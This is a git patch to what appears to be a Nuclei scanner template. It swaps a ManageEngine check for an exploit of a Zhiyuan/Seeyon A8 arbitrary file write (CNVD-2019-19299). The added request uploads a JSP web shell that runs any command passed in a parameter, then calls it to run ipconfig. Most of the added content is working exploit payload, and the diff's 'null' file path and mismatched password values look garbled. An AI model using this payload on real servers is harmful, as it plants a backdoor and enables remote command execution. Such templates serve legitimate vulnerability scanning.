From 9cce22a529f5f77e1ae1bf3d436c8aba4d840ef4 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
 <98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Mon, 9 May 2022 10:44:57 -0400
Subject: [PATCH] Enhancement: undefined by cs

---
 null | 61 ++++++++++++++++++++++++++++++++++++++----------------------
 1 file changed, 39 insertions(+), 22 deletions(-)

diff --git a/null b/null
index 5dc2171def..eaf0d56558 100644
--- a/null
+++ b/null
@@ -1,32 +1,49 @@
-id: CVE-2021-44077
+id: CNVD-2019-19299
 
 info:
-  name: Zoho ManageEngine ServiceDesk Plus - Remote Code Execution
-  author: Adam Crosser,gy741
+  name: Zhiyuan A8 Arbitrary File Write (RCE)
+  author: daffainfo
   severity: critical
-  description: Zoho ManageEngine ServiceDesk Plus before 11306, ServiceDesk Plus MSP before 10530, and SupportCenter Plus before 11014 are vulnerable to unauthenticated remote code execution.
   reference:
-    - https://www.cisa.gov/uscert/ncas/alerts/aa21-336a
-    - https://unit42.paloaltonetworks.com/tiltedtemple-manageengine-servicedesk-plus/
-    - https://github.com/horizon3ai/CVE-2021-44077
-    - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/manageengine_servicedesk_plus_cve_2021_44077.rb
-  classification:
-    cve-id: CVE-2021-44077
-  tags: cve,cve2021,cisa,zoho,manageengine,rce
+    - https://www.cxyzjd.com/article/guangying177/110177339
+    - https://github.com/sectestt/CNVD-2019-19299
+  tags: zhiyuan,cnvd,cnvd2019,rce
 
 requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/RestAPI/ImportTechnicians"
+  - raw:
+      - |
+        POST /seeyon/htmlofficeservlet HTTP/1.1
+        Host: {{Hostname}}
+        Pragma: no-cache
+        Cache-Control: no-cache
+        Upgrade-Insecure-Requests: 1
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q =0.8,application/signed-exchange;v=b3
+        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
+        Connection: close
 
-    matchers-condition: and
+        DBSTEP V3. 0 343 0 658 DBSTEP=OKMLlKlV
+        OPTION=S3WYOSWLBSGr
+        currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
+        = WUghPB3szB3Xwg66 the CREATEDATE
+        recordID = qLSGw4SXzLeGw4V3wUw3zUoXwid6
+        originalFileId = wV66
+        originalCreateDate = wUghPB3szB3Xwg66
+        FILENAME = qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdb4o5nHzs
+        needReadFile = yRWZdAS6
+        originalCreateDate IZ = 66 = = wLSGP4oEzLKAz4
+        <%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder ();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine( )) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString() ;} %><%if("x".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("{{randstr}}"))){out.println("<pre>" +excuteCmd(request.getParameter("{{randstr}}")) + "</pre>");}else{out.println(":-)");}%>6e4f045d4b8506bf492ada7e3390d7ce
+
+      - |
+        GET /seeyon/test123456.jsp?pwd=asasd3344&{{randstr}}=ipconfig HTTP/1.1
+        Host: {{Hostname}}
+
+    req-condition: true
     matchers:
-      - type: word
-        words:
-          - '<form name="ImportTechnicians"'
-
-      - type: status
-        status:
-          - 200
+      - type: dsl
+        dsl:
+          - 'status_code_2 == 200'
+          - 'contains(body_1, "htmoffice operate")'
+          - 'contains(body_2, "Windows IP")'
+        condition: and
 
 # Enhanced by cs on 2022/05/09